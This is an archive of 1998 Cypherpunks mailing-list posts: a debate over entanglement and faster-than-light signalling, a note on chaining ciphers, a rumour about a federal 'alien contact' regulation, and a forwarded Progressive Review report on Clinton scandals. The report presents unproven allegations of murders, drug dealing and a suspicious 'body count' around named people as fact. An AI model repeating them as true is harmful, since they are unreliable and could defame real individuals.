to the second.

The entropy here appears to decrease, but according to thermodynamics that
is impossible.  Can anyone explain how it is that the total entropy would
not decrease?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 29 Jan 1998 08:12:32 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: More down-to-earth apps for quantum teleportation...
Message-ID: <199801290008.SAA10115@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

On a slightly different tack, consider the application of quantum
teleportation to computer construction issues related to propagation delays
and multiplexing of data and control lines in limited volumes.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Thu, 29 Jan 1998 08:37:31 +0800
To: cypherpunks@cyberpass.net
Subject: Re: EPR, Bell, and FTL Bandwidth (fwd)
In-Reply-To: <199801282331.RAA09988@einstein.ssz.com>
Message-ID: <199801290030.SAA09986@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate writes:
 
> Um, actualy no. Since the photons are coupled we know that the second
> photon has actualy changed it's polarization, either that or your
> original assumption they are coupled is not true.
 
No.  Doing something to the first photon does not do anything to the
second, much less change its polarization.  The operators for
polarization for the two photons commute, so they are simultaneously
measureable.
 
The statistical correlation of measurements done on many pairs of
photons, with a choice of axis for measuring the polarization selected
on the fly, reflects that predicted by quantum mechanics for non-local
collapse of the overall wave function.  It is wrong to interpret this
as something done to one photon having a physical effect on the other.
 
> The polarization between the two photons *must* be zero. Otherwise you
> arent' playing with our physics.
 
Sorry, *OUR* physics explains all of this quite nicely.
 
> Correlation is not a function of any quantity conservation operation.
> The values of the photons are actualy opposite and therefore sum to
> zero. Foo is not the inverse of Bar, as is the case for horizontal and
> vertical polarization.
 
This isn't even wrong.
 
> True, but the swap of polarization was *not*. That occured later and
> is what changes instantly irrespective of distance.
 
There is no "swap of polarizations." The wavefunction of the entire
system changes quite smoothly with time, under the influence of the
usual operator.  Measurement places the system in an eigenstate for
the thing measured, and simultaneous measurements on branch systems
may show correlations consistant with non-local collapse of the
wavefunction.  None of this implies any physical effect on one photon
as a result of something done to the other.
 
> Yes, it causes the correlation to be destroyed. You are not taking
> into account the correllation or polarization dependency between the
> two photons. Our base assumption is that when photon A is horizontal
> then photon B is vertical. This *must* occur to preserve symmetry.
 
This isn't even wrong, either.

--  
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 29 Jan 1998 10:36:23 +0800
To: cypherpunks@Algebra.COM
Subject: Chaining ciphers
In-Reply-To: <9801290026.AA13035@mentat.com>
Message-ID: <v03102806b0f599c3ba80@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:26 PM -0800 1/28/98, Jim Gillogly wrote:

>Doesn't seem terribly likely.  Typically ciphers will look strong until
>someone discovers a chink.  The chink will sometimes lead to a serious
>break, but not always, and not always quickly -- but at that point the
>cipher looks weak.  Your best chance at encrypting stuff that needs a
>long shelf life is with a cipher that's had a lot of analysis and
>plenty of intrinsic key, like 3DES.

Carl Ellison talks about his strategy for chaining several ciphers.

I'm surprised more emphasis isn't given to doing this. For example, suppose
one chains 3DES, Blowfish, MISTY, IDEA, and GHOST together (I haven't
checked Schneier on these, but you all presumably get the idea). Then if
any one of these ciphers is shown to be weak, the overall chain remains
strong. The overall chain is as strong as its strongest link, not its
weakest link.

I don't think 3DES is weak, but chaining-in additional ciphers can't hurt.
(Just a minor slowdown in encipherment speed, presumably not important for
some critical uses.)

-- Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 29 Jan 1998 08:42:25 +0800
To: cypherpunks@ssz.com
Subject: waisgate.cgi?WAISdocID=3424713596+1+0+0&WAISaction=retrieve
Message-ID: <199801290041.SAA10375@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text/plain



[Code of Federal Regulations]
[Title 14, Volume 5, Parts 1200 to end]
[Revised as of January 1, 1997]
>From the U.S. Government Printing Office via GPO Access
[CITE: 14CFR1211]

[Page 75]

                     TITLE 14--AERONAUTICS AND SPACE

       CHAPTER V--NATIONAL AERONAUTICS AND SPACE ADMINISTRATION

PART 1211--[Reserved]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 29 Jan 1998 08:45:56 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: EPR, Bell, and FTL Bandwidth (fwd)
Message-ID: <199801290044.SAA10449@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Eric Cordian <emc@wire.insync.net>
> Subject: Re: EPR, Bell, and FTL Bandwidth (fwd)
> Date: Wed, 28 Jan 1998 18:30:56 -0600 (CST)

> No.  Doing something to the first photon does not do anything to the
> second, much less change its polarization.  The operators for
> polarization for the two photons commute, so they are simultaneously
> measureable.

This is the last I'm going to respond to this.

The photons are 'entangled' which means their states are linked and
co-dependant.

[rest deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 29 Jan 1998 08:48:08 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Can someone look this up? (fwd)
Message-ID: <199801290045.SAA10499@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 28 Jan 1998 19:16:36 -0500 (EST)
> From: Ray Arachelian <sunder@sundernet.com>
> Subject: Can someone look this up? (fwd)

> ---------- Forwarded message ----------
> Date: Tue, 27 Jan 1998 21:48:14 -0500
> From: Salvatore Denaro <sal@panix.com>
> To: 'Ray Arachelian' <sunder@brainlink.com>
> Subject: Can someone look this up?
> 
> Can someone on the list look this up?
> 
> ***************************************************************
> If the government has no knowledge of aliens, then why does
> Title 14, Section 1211 of the Code of Federal Regulations,
> implemented on July 16, 1969, make it illegal for U.S.
> citizens to have any contact with extraterrestrials or their
> vehicles?

It is of some interest to note that in the movie 'Andromeda Strain' the code
that trips Wildfire is a '1211'...


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: phelix@vallnet.com
Date: Thu, 29 Jan 1998 03:24:45 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Planetary rovers, SETI and other musings, was Re: update.356  (fwd)
In-Reply-To: <199801272132.PAA01922@einstein.ssz.com>
Message-ID: <34cf7df6.1786526@128.2.84.191>
MIME-Version: 1.0
Content-Type: text/plain



On 28 Jan 1998 12:24:30 -0600, Tim May <tcmay@got.net> wrote:

>I personally doubt that any flat spacetime topology (e.g., wormholes
>excepted) will admit any FTL signals. A lot of things would dramatically
>change if FTL communication existed...not the practical "communication"
>issues, which are human social minutiae, but issues about synchronization
>of reference frames and causality violations.

I remember seeing on one of those science specials on The learning channel
(or mabye the Discovery channel) that a professor did figure out
(accidentally) how to send information faster than light.  The only thing I
remember about it was the the signal was some kind of music.

I remember now, it was a special on time travel on a month ago.  Anybody
catch it?

-- Phelix





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Thu, 29 Jan 1998 09:01:59 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Can someone look this up? (fwd)
In-Reply-To: <Pine.SUN.3.96.980128191623.2815J-100000@beast.brainlink.com>
Message-ID: <199801290058.SAA10069@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



> ---------- Forwarded message ----------
> Date: Tue, 27 Jan 1998 21:48:14 -0500
> From: Salvatore Denaro <sal@panix.com>
> To: 'Ray Arachelian' <sunder@brainlink.com>
> Subject: Can someone look this up?

> Can someone on the list look this up?

> ***************************************************************
> If the government has no knowledge of aliens, then why does
> Title 14, Section 1211 of the Code of Federal Regulations,
> implemented on July 16, 1969, make it illegal for U.S.
> citizens to have any contact with extraterrestrials or their
> vehicles?

This legislation was passed in the Apollo era, and gave the government the
right to quarantine vehicles and personnel which had come in contact with
anything not of terrestrial origin.  It was aimed at writing into law a
legal right for NASA to engage in the type of isolation procedures done
after the first moon landing, and was not passed with UFOs in mind.

It's on the Web somewhere, but I don't recall the URL.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@sundernet.com>
Date: Thu, 29 Jan 1998 08:25:42 +0800
To: cypherpunks@toad.com
Subject: Can someone look this up? (fwd)
Message-ID: <Pine.SUN.3.96.980128191623.2815J-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Tue, 27 Jan 1998 21:48:14 -0500
From: Salvatore Denaro <sal@panix.com>
To: 'Ray Arachelian' <sunder@brainlink.com>
Subject: Can someone look this up?

Can someone on the list look this up?

***************************************************************
If the government has no knowledge of aliens, then why does
Title 14, Section 1211 of the Code of Federal Regulations,
implemented on July 16, 1969, make it illegal for U.S.
citizens to have any contact with extraterrestrials or their
vehicles?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 29 Jan 1998 02:32:24 +0800
To: cypherpunks@cyberpass.net
Subject: FWD --Progressive Review On-Line Report #70 (fwd)
Message-ID: <199801281822.TAA14817@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain








Date: Tue, 27 Jan 1998 11:43:02 -0500
From: The Progressive Review <72067.1525@compuserve.com>

Subject: Progressive Review On-Line Report #70

PROGRESSIVE REVIEW
ON-LINE REPORT #70
January 26, 1998

WASHINGTON'S MOST UNOFFICIAL SOURCE

A service of the Progressive Review: 1739 Conn. Ave. NW Washington DC 20009

202-232-5544  Fax: 202-234-6222 E-mail: ssmith@igc.org  Editor: Sam Smith.


The Progressive Review On-Line and our archives are found on the Web at:

http://emporium.turnpike.net/P/ProRev/

For a free trial subscription  to our hard copy edition and e-mail updates
send us your postal address with zip code(Sorry, foreign addresses will
receive e-mail edition only). To unsubscribe, send message with the word
'unsubscribe.'

Copyright 1998, The  Progressive Review. Matter not independently
copyrighted may be reprinted provided   you pay TPR your normal reprint
fees, if any, and give proper credit.

To discuss an appearance by Sam Smith before your group or on your campus,
contact The Progressive Review at 202-232-5544 or write ssmith@igc.org

AND NOW THE NEWS . . .

ACCESSORY AFTER THE FACT: THE MEDIA
AND THE CLINTON SCANDALS

Because it controls its own medium and can revise history at will, one
accessory after the fact in the Clinton scandals is almost certain to
remain unscathed: the media. From the beginning, journalists created a
fantasy portrait of Bill Clinton as a brilliant visionary, managerial
superman, and charismatic leader. During the New Hampshire primary in 1992,
the New Republic's Hendrik Hertzberg surveyed several dozen journalists and
found that all of them, had they been New Hampshire voters, would have
chosen Clinton. He suggested that, "the real reason members of the press
like Clinton is simple, and surprisingly uncynical: they think he would
make a very good, perhaps a great, president. Several told me they were
convinced that Clinton is the most talented presidential candidate they
have ever encountered, JFK included."

Not only was there no substantive evidence for such a conclusion, there was
plenty to suggest that Clinton was instead a politician of no fixed
philosophical or moral address, a man who began with compromise and
retreated from there, and a rampantly mundane governor. More importantly,
he was known to be less than honest, a sexual predator, and hung out with
some of the sleaziest types in his state.

In Shadows of Hope (Indiana University Press, 1994), I wrote:

"At the beginning of the 1992 campaign, few of us knew -- let alone
remembered -- anything about Bill Clinton. If we were not from Arkansas, we
had nothing for which to thank him. And our whirlwind relationship, our
arranged marriage, was under the constant control of the great American
matchmaker: the media. Clinton's past was not only unimportant to him, but
to us as well.

"In an earlier time, Clinton's non-history would have been an enormous
disqualification. Now it wasn't because Clinton had one huge edge over his
opponents: he looked and acted well on TV. Tom Harkin moved and spoke as
mechanically as the Energizer bunny; Kerry's personality and platform
remained a cipher; Tsongas talked funny; Brown was didactic; but Clinton
was at home.

"Against this advantage, facts faltered. The facts said that Clinton had
been an unexceptional governor. He could claim better prenatal care
programs and a decline in infant mortality, but at the same time the Center
for the Study of Social Policy would rate the state only 41st on children's
issues in general. Arkansas also ranked -- according to the Southern
Regional Council -- in the bottom ten percent of all states in average
weekly wages; health insurance coverage, state and local school revenue;
unemployment; blacks and women in traditional white male jobs;
environmental policy and overall conditions for workers.

"An examination of his record raised warning flags, not the least of which
were rocky relationships with labor and environmentalists. At the beginning
of the campaign Clinton came under attack by his state's AFL-CIO president
who (before the national union ordered him to shut up) sent around a highly
critical report on Clinton's record. Labor, said Bill Becker, should expect
Clinton's help only 25-30% of the time. And the League of Conservation
Voters ranked Clinton last among the Democratic candidates on conservation
issues.

"Greater attention to Clinton's record also might have brought to more
prominent notice the major tax increases during his tenure. Or the comment
by the union official who said that Clinton would slap you on the back and
piss down your leg. Or the tendency to waffle on issues. . . ."

There were still more serious questions, well summarized by Ambrose Evans-
Pritchard of London's Telegraph:

"The Clintons are attractive on the surface. As Yale Law School graduates
they have mastered the language and style of the mandarin class. It is only
when you walk through the mirrors into the Arkansas underworld whence they
came that you begin to realize that something is wrong. You learn that Bill
Clinton grew up in the Dixie Mafia stronghold of Hot Springs, and that his
brother was a drug dealer with ties to the Medilin Cartel. You learn that a
cocaine distributor named Dan Lasater was an intimate friend, and that
Lasater's top aide would later be given a post in charge of administration
(and drug testing) at the White House. You learn that Arkansas was a mini-
Colombia within the United States, infested by narco-corruption."

For such reasons, by the spring of 1992 I had become convinced that the
media portrayal of the Clintons was a fraud. Based on published material
available to any reporter in the country, I wrote a "Who's Who of Arkansas"
listing questionable individuals and institutions in the state and
illustrating their links. Included were Dan Lasater, Roger Clinton, Tyson's
Foods, Webb Hubbell, Buddy Young, the Arkansas Development Finance
Authority, the Worthen Bank, the Rose law firm, Stephens Inc, Larry Nichols,
Terry Reed, Jim & Susan McDougal, Gennifer Flowers, Mena, Ark., and even
Mochtar Riady. The names would become familiar.

The reporters who actual uncovered the Clinton scandals included Alexander
Cockburn, Ambrose Evans-Pritchard, Christopher Ruddy, Jerry Seper, J. D.
Cash, Hugh Sprunt, Michael Isakoff, Roger Morris, and Sally Denton. For
their troubles they were ridiculed, ignored, considered persona non grata
and called "wackos," "paranoids," and "conspiracy theorists." In at least
two cases -- a Isakoff''s piece on Paula Jones and a Roger Morris/Sally
Denton expose of Mena -- the Washington Post killed major stories just as
they were about to go into print, apparently on orders of top management.

It has been a shameful period in American journalism. Never have so many
journalists looked so determinedly away from the facts in order to maintain
a myth. And to this hour they continue. What follows is a listing of
Clinton-related stories that should have been investigated further or
gotten far more play than they did. It is a reminder that Bill Clinton has
not been the only problem we have had in Washington.

CLINTON UNCOVERED;
THE ORPHANED STORIES
OF WHITEWATER

STORIES KNOWN BEFORE
THE 1992 CONVENTION

--  Bill Clinton's affair with Gennifer Flowers and his proposed cover-up
of same. Papers such as the Washington Post refused to let their readers
know what was in the Flowers' tapes. For example, on the tape, Clinton says,
"If they ever hit you with it, just say no and go on. There's nothing they
can do. I expected them to look into it and come interview you, but if
everybody is on record denying it, no problem." Clinton also called Dukakis
a "little Greek motherfucker," said that Cuomo acted as though he were part
of the Mafia, and that Ted Kennedy couldn't get "a whore across a bridge."
There are constituencies that might have appreciated knowing this before
they went to the polls.

--  A black prostitute in Arkansas claims that Clinton had fathered her
child

--  Another woman reports being approached by a Clinton aide at a hotel
pool, who then arranges a sexual encounter with the governor.

--  A former Miss Arkansas appears on the Sally Jesse Rafael Show in July
1992 to say that she has had an affair with Clinton. Sally Perdue later
told the London Telegraph that Clinton often dropped over. After the TV
appearance she said she was visited by a man who called himself a
"Democratic Party operative" who warned her not to reveal specifics of the
affair:

"He said there were people in high places who were anxious about me and
they wanted me to know that keeping my mouth shut would be worthwhile. . .
If I was a good little girl, and didn't kill the messenger; I'd be set for
life: a federal job, nothing fancy but a regular paycheck. . . I'd never
have to worry again. But if I didn't take the offer, then they knew that I
went jogging by myself and he couldn't guarantee what would happen to my
'pretty little legs.' " Perdue said she found a shotgun cartridge on the
driver's seat of her Jeep and later had her back window shattered.

--  Alexander Cockburn reports that Larry Nichols, the state employee who
first brought the Flowers-Clinton and other liaisons to light, had recanted
but only after a physical threat.

--  There is substantial evidence of illegal Contra and drug operations at
Mena. Not only did most of the media fail to report the story, but Time, in
a piece called Anatomy of Smear, attempted to discredit those who had made
charges about Mena.

--  There are reports of questionable financial operations of the Arkansas
Development Finance Authority, set up by Clinton and first headed by Dan
Lasater, who was later convicted of cocaine distribution and who helped
Roger Clinton pay his debt to drug dealers.

--  On April 14, 1992, the Washington Times reports that "A federal-state
drug task force secretly recorded in June 1984 Gov. Bill Clinton's brother,
Roger, a heavy cocaine user at the time, boasting that he often took women
to the governor's mansion for sex."

--  Basic questions arise about Hillary Clinton's role as a lawyer
representing Madison Guaranty. These questions should have at least stalled
her canonization by the media, if not encouraging some actual investigative
reporting.

--  Serious questions arise about how Clinton, while running for state
attorney general, came to be a part owner in Whitewater. Whitewater is
basically a resort land scam. More than half the purchasers would lose
their land thanks to the sleazy form of financing used.

--  Connections between Jackson Stephens and the founder of BCCI are
revealed. Stephen's bank provides a multimillion dollar line of credit that
allows Clinton to stay in the primaries. According to a March 23 Alexander
Cockburn story, "It was Jackson Stephens who brokered the arrival of [BCCI]
into this country in 1977. He steered the bank's founder, Hassan Abedi,
toward Jimmy Carter's budget director, Bert Lance. . . .Stephens then
helped clear the ground, according to SEC documents, for Abedi's secret
takeover of First American Bankshares."

SUBSEQUENT SEX STORIES

--  Important confirmation of the Gennifer Flowers story appears in an Art
Harris Penthouse article in November 1992 that is widely ignored. Harris'
witnesses included Flowers' mother, ex-roommate and a former boyfriend.

--  Reports from four Arkansas state troopers of Clinton's sexual
activities, both before and after election, are discounted, ridiculed or
ignored. These include one trooper's report that he had brought a woman to
the governor's mansion during pre-dawn hours on three occasions after the
election. Also reported by troopers: one affair that lasted as late as
January 1993. The New York Times runs a piece trying to discredit the
troopers.

--  State phone call records and other bills, the LA Times reports, include
59 Clinton calls to one woman's home and office between 1989 and 1991.

--  A state trooper reports driving Clinton to Gennifer Flowers' apartment.

--  Paula Jones accuses Bill Clinton of sexually harassing her while he was
governor. This story will be long ignored, ridiculed or underplayed.

--  Timothy Maier of Insight Magazine follows up his stunning story of
Clinton administration bugging of over 300 locations during the 1993
Seattle Asia-Pacific Economic Cooperation Conference with word that FBI
videotapes of diplomatic suites "show underage boys engaging in sexcapades
with men in several rooms over a period of days." The operation involved
the FBI, CIA, NSA and Office of Naval Intelligence. Bugged were hotel rooms,
telephones, conference centers, cars, and even a charter boat. Some of the
information obtained was apparently passed on to individuals with financial
interests in Asia. Also involved: alleged kickbacks on purchases of
surveillance equipment by the spooks.

--  On July 3, 1997, Gennifer Flowers, interviewed by Penny Crone and
Curtis Sliwa on New York's WABC, claims that she had received threats --
including death threats -- around the time of her tape recorded
conversations with Bill Clinton and that this was why she had made the
recordings. Asked whether she thought Clinton was behind the threats,
Flowers replied, "What I thought, after my home was ransacked, was that he
was behind that -- simply because I had called to tell him about it and it
was his reaction it. I mean, he acted, he was aloof. Her didn't act that
concerned. He said, 'Well, why do you think they came in there?' And I said,
'Well, why the hell do you think?' He said, 'Well, do you think they were
looking for something on us?' I said, 'Well, yes.'"

THE VINCE FOSTER CASE

--  The mainstream media's conviction that any concerns about Vince
Foster's death are paranoid delusions is supported by virtually no
independent investigations. The media accepts without question shoddy,
incomplete and misleading reports by two special prosecutors and resorts to
personal attacks on critics. The issues raised by investigator such as
Chris Ruddy, Ambrose Evans-Pritchard and Hugh Sprunt have not yet been
answered.

--  Even Kenneth Starr is interested in the apparent cover-up and
obstruction of justice by high levels of White House that took place after
Foster's death. The media is bored by the story.

--  Patrick Knowlton files a lawsuit against the federal government
alleging extraordinary harassment aimed at dissuading him from sticking to
his account of what he saw in Ft. Marcy Park not long before the Foster
body was found. This harassment involved intensive and overt surveillance
by at least 25 men, some which was witnessed by his girlfriend and by
investigative reporter Christopher Ruddy. Knowlton's car was also smashed
by a person with a tire iron in front of witnesses. Investigative reporter
Ambrose Evans-Pritchard tracked down the car-smasher as well as a couple of
members of the surveillance team and believes them to be stringers working
for federal government intelligence and law enforcement.

--  Over the strenuous opposition of Kenneth Starr, the Whitewater
supervising judges unanimously allow a 20-page exception by Patrick
Knowlton to be appended to the prosecutor's report on Vince Foster. Seven
times Starr tries to get the statement of Knowlton rejected but the judges
let it stand -- despite the fact that it directly contradicts Starr and his
staff on key points. Most of the media fail to even report the existence of
this document.

THE JERRY PARKS CASE

--  Jerry Parks had been head of security for the Clinton Little Rock HQ.
He was also known to be building a dossier on Clinton, perhaps for Hillary.
On hearing the news of Foster's death, he told his wife, "I'm a dead man."
Not long after he was, rubbed out on a Little Rock street in a mob-style
hit. According to Parks' family his files on Clinton were removed by
federal agents. The murder has never been solved.

THE DIXIE MAFIA AND DRUGS

--  The Oct. 18 1994, Wall Street Journal runs a summary of the suppressed
investigation into drug running through the Mena, AK, airport. The WSJ
story recounts the ten year struggle of IRS investigator William Duncan to
expose the Mena operation. Despite nine separate federal and state probes,
nothing happened. Says Duncan -- who eventually quit in disgust: "The Mena
investigations were never supposed to see the light of day." They were
"interfered with and covered up, and the justice system was perverted."

--  Writing in the Oct. 9, 1994 London Telegraph, Ambrose Evans-Pritchard
writes that Arkansas was a "major point for the transshipment of drugs"
during the 1980s and "perilously close to becoming a 'narco-republic' -- a
sort of mini-Columbia within the borders of the United States." Evans-
Pritchard also alleges that by "1986 there was an epidemic of cocaine,
contaminating the political establishment from top to bottom," with parties
"at which cocaine would be served like hors d'oeuvres and sex was rampant."
He adds that Clinton attended some of these events.

--  In early 1995, the Washington Post suppresses Roger Morris and Sally
Denton's story on The Crimes of Mena, apparently a decision of top
management.

--  Former FBI director William Sessions says the Foster probe was
"compromised" from the beginning. Sessions had been fired by Bill Clinton
the day before Foster's death.

--  Janet Reno refuses to let independent prosecutor Dan Smaltz expand his
probe into areas that might lead to exposing major drug dealing in
Arkansas. .

--  The Tampa Tribune tells its readers about an ex-Mena CIA operative who
backs up stories concerning the Arkansas drug/Contra trade in the 1980s.
The ex-agent reports flying into Mena and Little Rock in 1983 and 1984 with
larger coolers marked "medical supplies." Who was on hand to pick up these
"medical supplies?" According to the ex-agent, none other than several
people quite close to then Governor Bill Clinton. The agent, now in jail,
claims he bailed out of black ops after ex-CIA chief William Colby asked
him to "neutralize" an American citizen. The Tribune's reporters have seen
documents that support the agents' claims.

--  While the press has no problem reporting such stories about Barry (or
Dan Quayle for that matter), it has not told the public about the existence
of a police tape of Roger Clinton describing his own cocaine trafficking
and saying of his brother, "Got to get some for my brother; he's got a nose
like a vacuum cleaner."

--  A former informant for a drug task force in Arkansas tells Ambrose
Evans-Pritchard of the London Telegraph that she supplied Bill with cocaine
during his first terms as governor. On one occasion, according to the woman,
"He was so messed up that night, he slid down the wall into a garbage can."

OTHER MATTERS

--  In July 1995, The Progressive Review writes: " Early in the Clinton
administration your editor had dinner with, among others, a high White
House official -- a lawyer. The conversation turned to marijuana. The
lawyer said that numerous staffers had asked how they should respond to FBI
queries on the matter. The official's reply was that they should remember
that they would only be in the White House for a short while but the FBI
files would be there forever. And what if friends or relatives actually saw
them using pot? The White House lawyer's response: "If you can't look an
FBI agent straight in the eye and tell him they were wrong, you don't
belong here."

--  Hillary Clinton makes a killing on a commodities futures deal that
defies the law of averages.

--  Louis Freeh, testifying before a House committee is asked whether he
has ever before run into a case (as with the Clinton scandals) in which 65
persons refused to testify or had left the country. Freeh said actually he
had: " I spent about 16 years doing organized crime cases in New York City
and many people were frequently unavailable."

--  In just two matters before a House investigating committee (the FBI
files and the travel office scandal) high White House officials, including
Mrs. Clinton, said "I don't recall," "I don't remember" or something
similar over 3,700 times.

--  There is growing evidence that the federal government had advance
warning of the OKC blast.

--  The White House is found to have improper possession of about 900
personal FBI files. Knight-Ridder reports, "College-age interns and other
volunteers had free access to hundreds of FBI investigative files kept in
the White House security office during the first months of the Clinton
administration. Nancy Gemmel, a retired security office deputy, said that
during the first few months of the Clinton Administration 'extremely young'
interns, 18 to 20 years of age, helped manage the heavy flow of paperwork.
Other older volunteers also pitched in. All of them had access to a vault
in the office that was used to store the background files. None of the
volunteers, according to Gemmel, had been cleared by the FBI to hand such
documents."

--  LD Brown, a former Arkansas state trooper who worked on Clinton's
security details, claims he was approached on a bus in England and offered
$100,000 and a job to change his Whitewater testimony. A second offer was
allegedly made in Little Rock.

THREATS, VIOLENCE & DEATH

--  The number of people who have been close to, or worked for, Bill
Clinton and who have committed suicide or otherwise experienced sudden
death is at the very least a statistical anomaly. Seventeen men who have
served Clinton as aides or bodyguards have died violently, four of them
during the Waco massacre and the rest in plane crashes. Five other plane
crashes have killed persons in the Clinton orbit. There have been six
deaths of unknown causes, six apparent suicides, 3 murders, 2 fatal skiing
accidents, and one fatal car accident. There have also been a number of
beatings, including of a man who had videotaped Clinton entering Gennifer
Flowers's apartment. His tapes were seized.

--  Aside from the Vince Foster and Jerry Parks deaths, the following
especially deserve more attention than they have received to date:

>>>Ron Brown's death. It is clear that proper procedure was not observed by
the military medical examiners. With the discovery of a wound suggestive of
a gun shot, calling for an independent autopsy would be a minimal and
reasonable editorial position. Looking into other matters concerning the
plane crash (including the disappearance of a recording device and the
suicide of an air controller) would also make sense.

>>>Kathy Ferguson and Bill Shelton. Kathy Ferguson was the ex-wife of Danny
Ferguson, the state trooper who arranged Paula Jones' visit to Bill
Clinton's suite. She allegedly committed suicide three months after the
Jones case was publicized. She was considered a likely witness when it came
to trial. A suicide note was found in her home but so were several packed
suitcases next to the body. Her fiance, state trooper Bill Shelton,
allegedly committed suicide by shooting himself at the gravesite of Kathy
Ferguson.

--  There are a steady stream of threats during the Clinton years, such as
those allegedly relayed to two state troopers by a Democratic official in
1993 that they would be "destroyed" if they spoke to the press, and the
phone call from Clinton's ex-security chief Buddy Young warning them not to
reveal anything.

--  Thomas M. DeFrank and Thomas Galvin of the New York Daily News describe
in the Weekly Standard strong-arm tactics used by the Clintonistas against
their critics. They write: "The president's impressive people skills and
abundant personal charm mask a streak of political cold-bloodedness and
score-settling worthy of a Mario Puzo novel. . . If you pose a threat to
this president, you're not merely a political adversary -- you're clearly a
bimbo, homosexual, homophobe, alcoholic, moron, sexual harasser, crook,
dupe, fellow travelers, embezzler, pathological liar, or even murderer. At
least that's what every reporter, news editor, bureau chief, or network
executive interested in what you have to say will be told."Examples abound.
Republican congressional investigators Jim Leach and William Clinger both
found themselves being trailed by private detectives. False stories are
spread such as the ones claiming that travel office head Billy Dale had
been fired after an independent audit found financial irregularities.
Editors and journalists are called and warned off sources. Talk show guests
are yanked. Paula Jones, Sally Perdue, and other women involved with
Clinton get viciously trashed, as have been various Arkansas state
troopers. Conclude DeFrank and Galvin: "Enemies have been intimidated,
inconvenient truths suppressed, and reputations shattered -- all at
negligible cost of the president."

And that's just part of the story.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 29 Jan 1998 08:32:41 +0800
To: Ray Arachelian <sunder@sundernet.com>
Subject: Re: Can someone look this up? (fwd)
Message-ID: <1.5.4.32.19980129002722.0070cbe4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



>Can someone on the list look this up?
>
>***************************************************************
>If the government has no knowledge of aliens, then why does
>Title 14, Section 1211 of the Code of Federal Regulations,
>implemented on July 16, 1969, make it illegal for U.S.
>citizens to have any contact with extraterrestrials or their
>vehicles?

Very SETI/UFO-mysterious. Here's what's listed (three times) at:

   http://www.access.gpo.gov/nara/cfr/index.html

